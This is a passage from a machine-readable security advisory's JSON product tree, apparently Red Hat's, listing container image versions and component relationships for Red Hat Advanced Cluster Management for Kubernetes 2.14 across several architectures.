"purl": "pkg:oci/prometheus-rhel9@sha256%3Aa1896f5f7d19945fe045b3f148c1802fa05bf6cb2d029d57a6ad618984f9b213?arch=s390x\u0026repository_url=registry.redhat.io/rhacm2"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:bf39aca4041bc20fecc14e0158462f3368755af4cdf92c278ed654d92b0a5ec4_s390x",
"product": {
"name": "registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:bf39aca4041bc20fecc14e0158462f3368755af4cdf92c278ed654d92b0a5ec4_s390x",
"product_id": "registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:bf39aca4041bc20fecc14e0158462f3368755af4cdf92c278ed654d92b0a5ec4_s390x",
"product_identification_helper": {
"purl": "pkg:oci/prometheus-alertmanager-rhel9@sha256%3Abf39aca4041bc20fecc14e0158462f3368755af4cdf92c278ed654d92b0a5ec4?arch=s390x\u0026repository_url=registry.redhat.io/rhacm2"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:f1293017bb56a08f22a0ecd3785e8fea7c6dd9592583fabebbc4c6c3a1ed2cd5_s390x",
"product": {
"name": "registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:f1293017bb56a08f22a0ecd3785e8fea7c6dd9592583fabebbc4c6c3a1ed2cd5_s390x",
"product_id": "registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:f1293017bb56a08f22a0ecd3785e8fea7c6dd9592583fabebbc4c6c3a1ed2cd5_s390x",
"product_identification_helper": {
"purl": "pkg:oci/acm-prometheus-config-reloader-rhel9@sha256%3Af1293017bb56a08f22a0ecd3785e8fea7c6dd9592583fabebbc4c6c3a1ed2cd5?arch=s390x\u0026repository_url=registry.redhat.io/rhacm2"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:6ce4f2f4e95e49e027d38d76e00e6ab05481389a2f1d7646f0741ca371a93869_s390x",
"product": {
"name": "registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:6ce4f2f4e95e49e027d38d76e00e6ab05481389a2f1d7646f0741ca371a93869_s390x",
"product_id": "registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:6ce4f2f4e95e49e027d38d76e00e6ab05481389a2f1d7646f0741ca371a93869_s390x",
"product_identification_helper": {
"purl": "pkg:oci/acm-prometheus-rhel9@sha256%3A6ce4f2f4e95e49e027d38d76e00e6ab05481389a2f1d7646f0741ca371a93869?arch=s390x\u0026repository_url=registry.redhat.io/rhacm2"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:370c2024529902a32cb9e82d3dc793a0e5ac9de8a5345e58674078074f7222a6_s390x",
"product": {
"name": "registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:370c2024529902a32cb9e82d3dc793a0e5ac9de8a5345e58674078074f7222a6_s390x",
"product_id": "registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:370c2024529902a32cb9e82d3dc793a0e5ac9de8a5345e58674078074f7222a6_s390x",
"product_identification_helper": {
"purl": "pkg:oci/rbac-query-proxy-rhel9@sha256%3A370c2024529902a32cb9e82d3dc793a0e5ac9de8a5345e58674078074f7222a6?arch=s390x\u0026repository_url=registry.redhat.io/rhacm2"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/search-collector-rhel9@sha256:80f8f269b175dfbecc4c21c39b6385e4fc0939a0e5297e580213412f558ac583_s390x",
"product": {
"name": "registry.redhat.io/rhacm2/search-collector-rhel9@sha256:80f8f269b175dfbecc4c21c39b6385e4fc0939a0e5297e580213412f558ac583_s390x",
"product_id": "registry.redhat.io/rhacm2/search-collector-rhel9@sha256:80f8f269b175dfbecc4c21c39b6385e4fc0939a0e5297e580213412f558ac583_s390x",
"product_identification_helper": {
"purl": "pkg:oci/search-collector-rhel9@sha256%3A80f8f269b175dfbecc4c21c39b6385e4fc0939a0e5297e580213412f558ac583?arch=s390x\u0026repository_url=registry.redhat.io/rhacm2"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:fdd3dc61d0214588fdfdc0260cd75c395e02615bc73633d84184dee02effe404_s390x",
"product": {
"name": "registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:fdd3dc61d0214588fdfdc0260cd75c395e02615bc73633d84184dee02effe404_s390x",
"product_id": "registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:fdd3dc61d0214588fdfdc0260cd75c395e02615bc73633d84184dee02effe404_s390x",
"product_identification_helper": {
"purl": "pkg:oci/acm-search-indexer-rhel9@sha256%3Afdd3dc61d0214588fdfdc0260cd75c395e02615bc73633d84184dee02effe404?arch=s390x\u0026repository_url=registry.redhat.io/rhacm2"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:47b07ed00366723b4063957769aaefc49b4bbcd4bcf14bf675b653db5a10ab01_s390x",
"product": {
"name": "registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:47b07ed00366723b4063957769aaefc49b4bbcd4bcf14bf675b653db5a10ab01_s390x",
"product_id": "registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:47b07ed00366723b4063957769aaefc49b4bbcd4bcf14bf675b653db5a10ab01_s390x",
"product_identification_helper": {
"purl": "pkg:oci/acm-search-v2-api-rhel9@sha256%3A47b07ed00366723b4063957769aaefc49b4bbcd4bcf14bf675b653db5a10ab01?arch=s390x\u0026repository_url=registry.redhat.io/rhacm2"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:c04d51be3f48aff9d8741b0e4be39497d89265b85f029487ab52440efe0f28f7_s390x",
"product": {
"name": "registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:c04d51be3f48aff9d8741b0e4be39497d89265b85f029487ab52440efe0f28f7_s390x",
"product_id": "registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:c04d51be3f48aff9d8741b0e4be39497d89265b85f029487ab52440efe0f28f7_s390x",
"product_identification_helper": {
"purl": "pkg:oci/acm-search-v2-rhel9@sha256%3Ac04d51be3f48aff9d8741b0e4be39497d89265b85f029487ab52440efe0f28f7?arch=s390x\u0026repository_url=registry.redhat.io/rhacm2"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:ba7ccd4485603b4ec39569b8e87122de610a6775f022f53e1150db0dbdbe2bcf_s390x",
"product": {
"name": "registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:ba7ccd4485603b4ec39569b8e87122de610a6775f022f53e1150db0dbdbe2bcf_s390x",
"product_id": "registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:ba7ccd4485603b4ec39569b8e87122de610a6775f022f53e1150db0dbdbe2bcf_s390x",
"product_identification_helper": {
"purl": "pkg:oci/acm-siteconfig-rhel9@sha256%3Aba7ccd4485603b4ec39569b8e87122de610a6775f022f53e1150db0dbdbe2bcf?arch=s390x\u0026repository_url=registry.redhat.io/rhacm2"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:28072f029e61aa7fdfef70a767f5c809775dddaef337d6bfe48ec25f7839a184_s390x",
"product": {
"name": "registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:28072f029e61aa7fdfef70a767f5c809775dddaef337d6bfe48ec25f7839a184_s390x",
"product_id": "registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:28072f029e61aa7fdfef70a767f5c809775dddaef337d6bfe48ec25f7839a184_s390x",
"product_identification_helper": {
"purl": "pkg:oci/submariner-addon-rhel9@sha256%3A28072f029e61aa7fdfef70a767f5c809775dddaef337d6bfe48ec25f7839a184?arch=s390x\u0026repository_url=registry.redhat.io/rhacm2"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/thanos-rhel9@sha256:f70d80b998b2b03c91f59b77a315e82737c304ffe174f5d1839dd28c2ec01bed_s390x",
"product": {
"name": "registry.redhat.io/rhacm2/thanos-rhel9@sha256:f70d80b998b2b03c91f59b77a315e82737c304ffe174f5d1839dd28c2ec01bed_s390x",
"product_id": "registry.redhat.io/rhacm2/thanos-rhel9@sha256:f70d80b998b2b03c91f59b77a315e82737c304ffe174f5d1839dd28c2ec01bed_s390x",
"product_identification_helper": {
"purl": "pkg:oci/thanos-rhel9@sha256%3Af70d80b998b2b03c91f59b77a315e82737c304ffe174f5d1839dd28c2ec01bed?arch=s390x\u0026repository_url=registry.redhat.io/rhacm2"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:e77b6c7a0890213bcdff276d240e9e6ac773f90dc6b4b1626dfc4c70fceb846c_s390x",
"product": {
"name": "registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:e77b6c7a0890213bcdff276d240e9e6ac773f90dc6b4b1626dfc4c70fceb846c_s390x",
"product_id": "registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:e77b6c7a0890213bcdff276d240e9e6ac773f90dc6b4b1626dfc4c70fceb846c_s390x",
"product_identification_helper": {
"purl": "pkg:oci/thanos-receive-controller-rhel9@sha256%3Ae77b6c7a0890213bcdff276d240e9e6ac773f90dc6b4b1626dfc4c70fceb846c?arch=s390x\u0026repository_url=registry.redhat.io/rhacm2"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:86392c4f03ba2eec91ccbc75a0679f91e38cbd1ccf3aa55e6f942d664a254213_s390x",
"product": {
"name": "registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:86392c4f03ba2eec91ccbc75a0679f91e38cbd1ccf3aa55e6f942d664a254213_s390x",
"product_id": "registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:86392c4f03ba2eec91ccbc75a0679f91e38cbd1ccf3aa55e6f942d664a254213_s390x",
"product_identification_helper": {
"purl": "pkg:oci/acm-volsync-addon-controller-rhel9@sha256%3A86392c4f03ba2eec91ccbc75a0679f91e38cbd1ccf3aa55e6f942d664a254213?arch=s390x\u0026repository_url=registry.redhat.io/rhacm2"
}
}
}
],
"category": "architecture",
"name": "s390x"
}
],
"category": "vendor",
"name": "Red Hat"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:7093e9c5c223922accfd344ad2bba34c763eab82b35669cf175a3333b2b4e445_ppc64le as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:7093e9c5c223922accfd344ad2bba34c763eab82b35669cf175a3333b2b4e445_ppc64le"
},
"product_reference": "registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:7093e9c5c223922accfd344ad2bba34c763eab82b35669cf175a3333b2b4e445_ppc64le",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:b646fa5444f28c01365df32d019e0f57872b450597ae2bb6993e86014d1a7548_s390x as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:b646fa5444f28c01365df32d019e0f57872b450597ae2bb6993e86014d1a7548_s390x"
},
"product_reference": "registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:b646fa5444f28c01365df32d019e0f57872b450597ae2bb6993e86014d1a7548_s390x",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:b7bfd21a3a383f631488e0cc979ea9969dc3cd6f2db10960f524e37b058dfd5c_amd64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:b7bfd21a3a383f631488e0cc979ea9969dc3cd6f2db10960f524e37b058dfd5c_amd64"
},
"product_reference": "registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:b7bfd21a3a383f631488e0cc979ea9969dc3cd6f2db10960f524e37b058dfd5c_amd64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:f8b6b891e5a948fc03983b2f40bee3eb312e5bef80b2a35fc502d28ed96e1c93_arm64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:f8b6b891e5a948fc03983b2f40bee3eb312e5bef80b2a35fc502d28ed96e1c93_arm64"
},
"product_reference": "registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:f8b6b891e5a948fc03983b2f40bee3eb312e5bef80b2a35fc502d28ed96e1c93_arm64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:05847c2e995e681bdcc3f809e76f512767f40ac4498c14fad4afb4cae83f33d1_arm64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:05847c2e995e681bdcc3f809e76f512767f40ac4498c14fad4afb4cae83f33d1_arm64"
},
"product_reference": "registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:05847c2e995e681bdcc3f809e76f512767f40ac4498c14fad4afb4cae83f33d1_arm64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:4f03df7f0ee87ce88f225e193f03e6471e26808e8a5224bd75828740cf5e42b4_amd64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:4f03df7f0ee87ce88f225e193f03e6471e26808e8a5224bd75828740cf5e42b4_amd64"
},
"product_reference": "registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:4f03df7f0ee87ce88f225e193f03e6471e26808e8a5224bd75828740cf5e42b4_amd64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:844cb73f99650653f57b64fa478ae4d0b207cd60040cdbd743bca7fd76af30ea_s390x as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:844cb73f99650653f57b64fa478ae4d0b207cd60040cdbd743bca7fd76af30ea_s390x"
},
"product_reference": "registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:844cb73f99650653f57b64fa478ae4d0b207cd60040cdbd743bca7fd76af30ea_s390x",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:8f220b523bebe0d150987f34090005f500af558f0659808d4bee974fbb48dd42_ppc64le as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:8f220b523bebe0d150987f34090005f500af558f0659808d4bee974fbb48dd42_ppc64le"
},
"product_reference": "registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:8f220b523bebe0d150987f34090005f500af558f0659808d4bee974fbb48dd42_ppc64le",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:1399e0cd77802ef77f4ca5c80e2173516420755581c886949cc5f5bd7473f38b_amd64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:1399e0cd77802ef77f4ca5c80e2173516420755581c886949cc5f5bd7473f38b_amd64"
},
"product_reference": "registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:1399e0cd77802ef77f4ca5c80e2173516420755581c886949cc5f5bd7473f38b_amd64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:4e0e3c4f0fc0cc13d9780487ccf9a1315ff0e867c003cb5a9c919d2b20bd3e58_arm64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:4e0e3c4f0fc0cc13d9780487ccf9a1315ff0e867c003cb5a9c919d2b20bd3e58_arm64"
},
"product_reference": "registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:4e0e3c4f0fc0cc13d9780487ccf9a1315ff0e867c003cb5a9c919d2b20bd3e58_arm64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:7f45bf6cfb2eefd9107b76524fd83883f389eda8f69f1f2ee55b56542283d9b4_ppc64le as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:7f45bf6cfb2eefd9107b76524fd83883f389eda8f69f1f2ee55b56542283d9b4_ppc64le"
},
"product_reference": "registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:7f45bf6cfb2eefd9107b76524fd83883f389eda8f69f1f2ee55b56542283d9b4_ppc64le",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:911c05cb845692bb81e2749b73fd9fd6826771cb4b5ac6ad119a8f3fcfb650ba_s390x as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:911c05cb845692bb81e2749b73fd9fd6826771cb4b5ac6ad119a8f3fcfb650ba_s390x"
},
"product_reference": "registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:911c05cb845692bb81e2749b73fd9fd6826771cb4b5ac6ad119a8f3fcfb650ba_s390x",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:6b34944da4fcf630306c6bef503b659b7ed578faf0f5b5e3c0bf2938b1f18247_ppc64le as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:6b34944da4fcf630306c6bef503b659b7ed578faf0f5b5e3c0bf2938b1f18247_ppc64le"
},
"product_reference": "registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:6b34944da4fcf630306c6bef503b659b7ed578faf0f5b5e3c0bf2938b1f18247_ppc64le",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:76350af87e31aaa6521d99ee32fefa7792de71d25ade270646f9cbc2332d3725_arm64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:76350af87e31aaa6521d99ee32fefa7792de71d25ade270646f9cbc2332d3725_arm64"
},
"product_reference": "registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:76350af87e31aaa6521d99ee32fefa7792de71d25ade270646f9cbc2332d3725_arm64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:bf7eee7477d52688df5520c2053aa294ae9c4baf4c0c885a0d5ba5a4c7c790c3_s390x as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:bf7eee7477d52688df5520c2053aa294ae9c4baf4c0c885a0d5ba5a4c7c790c3_s390x"
},
"product_reference": "registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:bf7eee7477d52688df5520c2053aa294ae9c4baf4c0c885a0d5ba5a4c7c790c3_s390x",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:d8eaa77004ccaa78036830fd5872dd2da30ca3ffc0b468b587b7561630640b9e_amd64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:d8eaa77004ccaa78036830fd5872dd2da30ca3ffc0b468b587b7561630640b9e_amd64"
},
"product_reference": "registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:d8eaa77004ccaa78036830fd5872dd2da30ca3ffc0b468b587b7561630640b9e_amd64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:0ee74288b19b217b917a4719d08bd1ddead9fdc90bac9f9868b8d721e12a8576_s390x as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:0ee74288b19b217b917a4719d08bd1ddead9fdc90bac9f9868b8d721e12a8576_s390x"
},
"product_reference": "registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:0ee74288b19b217b917a4719d08bd1ddead9fdc90bac9f9868b8d721e12a8576_s390x",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:69517bbf832177af9b8ce276032625b935f3939afbfa05a01bafbe5252416892_amd64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:69517bbf832177af9b8ce276032625b935f3939afbfa05a01bafbe5252416892_amd64"
},
"product_reference": "registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:69517bbf832177af9b8ce276032625b935f3939afbfa05a01bafbe5252416892_amd64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:78b26db7d7a4ba4d63f0d466ee0a4588c5606f64d6617585efbe363903cc2bff_ppc64le as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:78b26db7d7a4ba4d63f0d466ee0a4588c5606f64d6617585efbe363903cc2bff_ppc64le"
},
"product_reference": "registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:78b26db7d7a4ba4d63f0d466ee0a4588c5606f64d6617585efbe363903cc2bff_ppc64le",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:feffbb2c5cd8b8edb0944e5d1c49bb49aeb902bb6f44343a7e882c060efaa108_arm64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:feffbb2c5cd8b8edb0944e5d1c49bb49aeb902bb6f44343a7e882c060efaa108_arm64"
},
"product_reference": "registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:feffbb2c5cd8b8edb0944e5d1c49bb49aeb902bb6f44343a7e882c060efaa108_arm64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:492e4517ce3576fb77dac831c7bc0ad56914646feed30858918b5e86b00ba71e_s390x as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:492e4517ce3576fb77dac831c7bc0ad56914646feed30858918b5e86b00ba71e_s390x"
},
"product_reference": "registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:492e4517ce3576fb77dac831c7bc0ad56914646feed30858918b5e86b00ba71e_s390x",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:5e1fd4942feef5acc27fbc5fc0ca43956a68c718768bbcc5bf3589cb2dfc389a_ppc64le as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:5e1fd4942feef5acc27fbc5fc0ca43956a68c718768bbcc5bf3589cb2dfc389a_ppc64le"
},
"product_reference": "registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:5e1fd4942feef5acc27fbc5fc0ca43956a68c718768bbcc5bf3589cb2dfc389a_ppc64le",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:9902b0f5c4d507d881314c621a14aa922c473cad40e5ad0a3b98c47540006fef_arm64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:9902b0f5c4d507d881314c621a14aa922c473cad40e5ad0a3b98c47540006fef_arm64"
},
"product_reference": "registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:9902b0f5c4d507d881314c621a14aa922c473cad40e5ad0a3b98c47540006fef_arm64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:f534b88cb3db85b58b6f48ef64c433c673d422bf41d09fd303ffb5d7091a3b34_amd64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:f534b88cb3db85b58b6f48ef64c433c673d422bf41d09fd303ffb5d7091a3b34_amd64"
},
"product_reference": "registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:f534b88cb3db85b58b6f48ef64c433c673d422bf41d09fd303ffb5d7091a3b34_amd64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:182c0d1f98ca9809ff1e31387bc19c9a110dba2d49538cc2acae18bb4910c902_s390x as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:182c0d1f98ca9809ff1e31387bc19c9a110dba2d49538cc2acae18bb4910c902_s390x"
},
